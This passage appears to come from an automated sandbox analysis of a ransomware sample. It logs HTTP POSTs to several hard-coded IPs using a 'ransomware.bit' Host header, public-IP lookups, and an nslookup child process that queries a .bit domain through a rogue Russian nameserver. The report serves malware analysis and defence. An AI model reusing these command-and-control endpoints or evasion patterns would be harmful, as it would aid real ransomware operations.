Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 193.33.1.19, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = ereboa?steapl=deeiss&ss=aib, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Add HTTP Request Headers headers = Host: ransomware.bit True 1
Fn
Send HTTP Request headers = Content-Type: application/x-www-form-urlencoded, url = 193.33.1.19/ereboa?steapl=deeiss&ss=aib False 1
Fn
Close Session - True 34
Fn
HTTP Session #5
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Server Name ipv4bot.whatismyipaddress.com
Server Port 80
Data Sent 295
Data Received 13
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = ipv4bot.whatismyipaddress.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Add HTTP Request Headers headers = Host: ransomware.bit True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = ipv4bot.whatismyipaddress.com/ True 1
Fn
Read Response size = 10238, size_out = 13 True 1
Fn
Data
Read Response size = 10238, size_out = 0 True 1
Fn
Close Session - True 34
Fn
HTTP Session #6
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Server Name 190.140.194.176
Server Port 80
Data Sent 281
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 190.140.194.176, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = eighlo?s=ploa, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Add HTTP Request Headers headers = Host: ransomware.bit True 1
Fn
Send HTTP Request headers = Content-Type: application/x-www-form-urlencoded, url = 190.140.194.176/eighlo?s=ploa False 1
Fn
Close Session - True 34
Fn
HTTP Session #7
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Server Name ipv4bot.whatismyipaddress.com
Server Port 80
Data Sent 295
Data Received 13
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = ipv4bot.whatismyipaddress.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Add HTTP Request Headers headers = Host: ransomware.bit True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = ipv4bot.whatismyipaddress.com/ True 1
Fn
Read Response size = 10238, size_out = 13 True 1
Fn
Data
Read Response size = 10238, size_out = 0 True 1
Fn
Close Session - True 34
Fn
HTTP Session #8
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Server Name 84.54.187.24
Server Port 80
Data Sent 274
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 84.54.187.24, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = fui?eizaer=b, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Add HTTP Request Headers headers = Host: ransomware.bit True 1
Fn
Send HTTP Request headers = Content-Type: application/x-www-form-urlencoded, url = 84.54.187.24/fui?eizaer=b False 1
Fn
Close Session - True 34
Fn
HTTP Session #9
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Server Name ipv4bot.whatismyipaddress.com
Server Port 80
Data Sent 295
Data Received 13
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = ipv4bot.whatismyipaddress.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Add HTTP Request Headers headers = Host: ransomware.bit True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = ipv4bot.whatismyipaddress.com/ True 1
Fn
Read Response size = 10238, size_out = 13 True 1
Fn
Data
Read Response size = 10238, size_out = 0 True 1
Fn
Close Session - True 34
Fn
HTTP Session #10
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Server Name 193.33.1.19
Server Port 80
Data Sent 284
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 193.33.1.19, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = erpheab?s=ee&boa=ploreph, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Add HTTP Request Headers headers = Host: ransomware.bit True 1
Fn
Send HTTP Request headers = Content-Type: application/x-www-form-urlencoded, url = 193.33.1.19/erpheab?s=ee&boa=ploreph False 1
Fn
Close Session - True 34
Fn
HTTP Session #11
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Server Name ipv4bot.whatismyipaddress.com
Server Port 80
Data Sent 295
Data Received 13
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = ipv4bot.whatismyipaddress.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Add HTTP Request Headers headers = Host: ransomware.bit True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = ipv4bot.whatismyipaddress.com/ True 1
Fn
Read Response size = 10238, size_out = 13 True 1
Fn
Data
Read Response size = 10238, size_out = 0 True 1
Fn
Close Session - True 34
Fn
HTTP Session #12
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Server Name 85.187.48.16
Server Port 80
Data Sent 282
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 85.187.48.16, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = pheade?ai=eyde&ei=gh, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Add HTTP Request Headers headers = Host: ransomware.bit True 1
Fn
Send HTTP Request headers = Content-Type: application/x-www-form-urlencoded, url = 85.187.48.16/pheade?ai=eyde&ei=gh False 1
Fn
Close Session - True 34
Fn
HTTP Session #13
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Server Name ipv4bot.whatismyipaddress.com
Server Port 80
Data Sent 295
Data Received 13
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = ipv4bot.whatismyipaddress.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Add HTTP Request Headers headers = Host: ransomware.bit True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = ipv4bot.whatismyipaddress.com/ True 1
Fn
Read Response size = 10238, size_out = 13 True 1
Fn
Data
Read Response size = 10238, size_out = 0 True 1
Fn
Close Session - True 34
Fn
HTTP Session #14
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Server Name 84.54.187.24
Server Port 80
Data Sent 281
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 84.54.187.24, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = eregheyss?ph=zaowlo, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Add HTTP Request Headers headers = Host: ransomware.bit True 1
Fn
Send HTTP Request headers = Content-Type: application/x-www-form-urlencoded, url = 84.54.187.24/eregheyss?ph=zaowlo False 1
Fn
Close Session - True 34
Fn
HTTP Session #15
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Server Name ipv4bot.whatismyipaddress.com
Server Port 80
Data Sent 295
Data Received 13
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = ipv4bot.whatismyipaddress.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Add HTTP Request Headers headers = Host: ransomware.bit True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = ipv4bot.whatismyipaddress.com/ True 1
Fn
Read Response size = 10238, size_out = 13 True 1
Fn
Data
Read Response size = 10238, size_out = 0 True 1
Fn
Close Session - True 34
Fn
HTTP Session #16
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Server Name 217.75.83.218
Server Port 80
Data Sent 294
Data Received 552
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 217.75.83.218, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = aygha?ghaige=uilo&aiscer=oreph, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Add HTTP Request Headers headers = Host: ransomware.bit True 1
Fn
Send HTTP Request headers = Content-Type: application/x-www-form-urlencoded, url = 217.75.83.218/aygha?ghaige=uilo&aiscer=oreph True 1
Fn
Data
Read Response size = 204798, size_out = 552 True 1
Fn
Data
Read Response size = 204798, size_out = 0 True 1
Fn
Close Session - True 34
Fn
HTTP Session #17
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Server Name 85.187.48.16
Server Port 80
Data Sent 293
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 85.187.48.16, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = lfeylfui?geeage=ph&oreplow=iess, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Add HTTP Request Headers headers = Host: ransomware.bit True 1
Fn
Send HTTP Request headers = Content-Type: application/x-www-form-urlencoded, url = 85.187.48.16/lfeylfui?geeage=ph&oreplow=iess False 1
Fn
Close Session - True 34
Fn
Process #12: nslookup.exe
8 16
»
Information Value
ID #12
File Name c:\windows\syswow64\nslookup.exe
Command Line nslookup zonealarm.bit ns1.corp-servers.ru
Initial Working Directory C:\WINDOWS\system32\
Monitor Start Time: 00:02:55, Reason: Child Process
Unmonitor End Time: 00:05:46, Reason: Terminated by Timeout
Monitor Duration 00:02:51
OS Process Information
»
Information Value
PID 0x1128
Parent PID 0x1064 (c:\users\fd1hvy\appdata\roaming\microsoft\ibpbzu.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username NQDPDE\FD1HVy
Enabled Privileges SeChangeNotifyPrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 112C
0x 114C
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
nslookup.exe 0x008d0000 0x008e6fff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x0000000000c20000 0x00c20000 0x02c1ffff Pagefile Backed Memory - True False False -
private_0x0000000002c20000 0x02c20000 0x02c3ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002c20000 0x02c20000 0x02c2ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000002c30000 0x02c30000 0x02c33fff Private Memory Readable, Writable True False False -
private_0x0000000002c40000 0x02c40000 0x02c41fff Private Memory Readable, Writable True False False -
pagefile_0x0000000002c40000 0x02c40000 0x02c41fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000002c50000 0x02c50000 0x02c67fff Pagefile Backed Memory Readable True False False -
private_0x0000000002c70000 0x02c70000 0x02caffff Private Memory Readable, Writable True False False -
private_0x0000000002cb0000 0x02cb0000 0x02ceffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002cf0000 0x02cf0000 0x02cf3fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000002d00000 0x02d00000 0x02d00fff Pagefile Backed Memory Readable True False False -
private_0x0000000002d10000 0x02d10000 0x02d10fff Private Memory Readable, Writable True False False -
locale.nls 0x02d20000 0x02de4fff Memory Mapped File Readable False False False -
pagefile_0x0000000002df0000 0x02df0000 0x02df0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000002e00000 0x02e00000 0x02ffffff Private Memory Readable, Writable True False False -
private_0x0000000003000000 0x03000000 0x0303ffff Private Memory Readable, Writable True False False -
private_0x0000000003040000 0x03040000 0x0307ffff Private Memory Readable, Writable True False False -
private_0x0000000003080000 0x03080000 0x03083fff Private Memory Readable, Writable True False False -
private_0x00000000030c0000 0x030c0000 0x030cffff Private Memory Readable, Writable True False False -
private_0x0000000003180000 0x03180000 0x0318ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000003190000 0x03190000 0x032ccfff Pagefile Backed Memory Readable True False False -
private_0x0000000003300000 0x03300000 0x033fffff Private Memory Readable, Writable True False False -
wow64.dll 0x68d50000 0x68da0fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x68db0000 0x68db9fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x68dc0000 0x68e32fff Memory Mapped File Readable, Writable, Executable False False False -
winrnr.dll 0x73260000 0x7326afff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x73270000 0x73282fff Memory Mapped File Readable, Writable, Executable False False False -
pnrpnsp.dll 0x73290000 0x732a5fff Memory Mapped File Readable, Writable, Executable False False False -
napinsp.dll 0x732b0000 0x732c0fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x732d0000 0x73319fff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x73320000 0x73327fff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x73330000 0x733aefff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x73c10000 0x73c5dfff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x73c60000 0x73c8efff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x73ce0000 0x73cf7fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x73e10000 0x73e19fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x73e20000 0x73e3ffff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x758a0000 0x75a61fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x75a70000 0x75ad6fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75ae0000 0x75baffff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x76190000 0x761d0fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x76220000 0x76226fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x76240000 0x762fcfff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x766b0000 0x76706fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x77030000 0x770effff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77350000 0x774ddfff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007eea0000 0x7eea0000 0x7ef9ffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000007efa0000 0x7efa0000 0x7efc2fff Pagefile Backed Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffe0fff Private Memory Readable True False False -
private_0x000000007ffe1000 0x7ffe1000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7dfb2498ffff Private Memory Readable True False False -
pagefile_0x00007dfb24990000 0x7dfb24990000 0x7ffb2498ffff Pagefile Backed Memory - True False False -
ntdll.dll 0x7ffb24990000 0x7ffb24b6afff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ffb24b6b000 0x7ffb24b6b000 0x7ffffffeffff Private Memory Readable True False False -
Host Behavior
Registry (7)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient - False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DNSLookupOrder False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = Domain True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpDomain False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = SearchList False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpSearchList False 1
Fn
Module (1)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\nslookup.exe base_address = 0x8d0000 True 1
Fn
Network Behavior
DNS (2)
»
Operation Additional Information Success Count Logfile
Get Hostname name_out = NQdPdE True 1
Fn
Resolve Name host = ns1.corp-servers.ru, address_out = 94.249.60.127, 94.183.71.48, 89.203.10.56, 189.75.183.21 True 1
Fn
UDP Sessions (3)
»
Information Value
Total Data Sent 106 bytes
Total Data Received 772 bytes
Contacted Host Count 1
Contacted Hosts 94.249.60.127:53
UDP Session #1
»
Information Value
Handle 0x1bc
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 94.249.60.127
Remote Port 53
Local Address -
Local Port -
Data Sent 44 bytes
Data Received 0 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 94.249.60.127, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 44, size_out = 44 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
UDP Session #2
»
Information Value
Handle 0x1bc
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 94.249.60.127
Remote Port 53
Local Address -
Local Port -
Data Sent 31 bytes
Data Received 191 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 94.249.60.127, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 31, size_out = 31 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 191 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
UDP Session #3
»
Information Value
Handle 0x1bc
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 94.249.60.127
Remote Port 53
Local Address -
Local Port -
Data Sent 31 bytes
Data Received 581 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 94.249.60.127, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 31, size_out = 31 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 581 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
Process #14: nslookup.exe
8 16
»
Information Value
ID #14
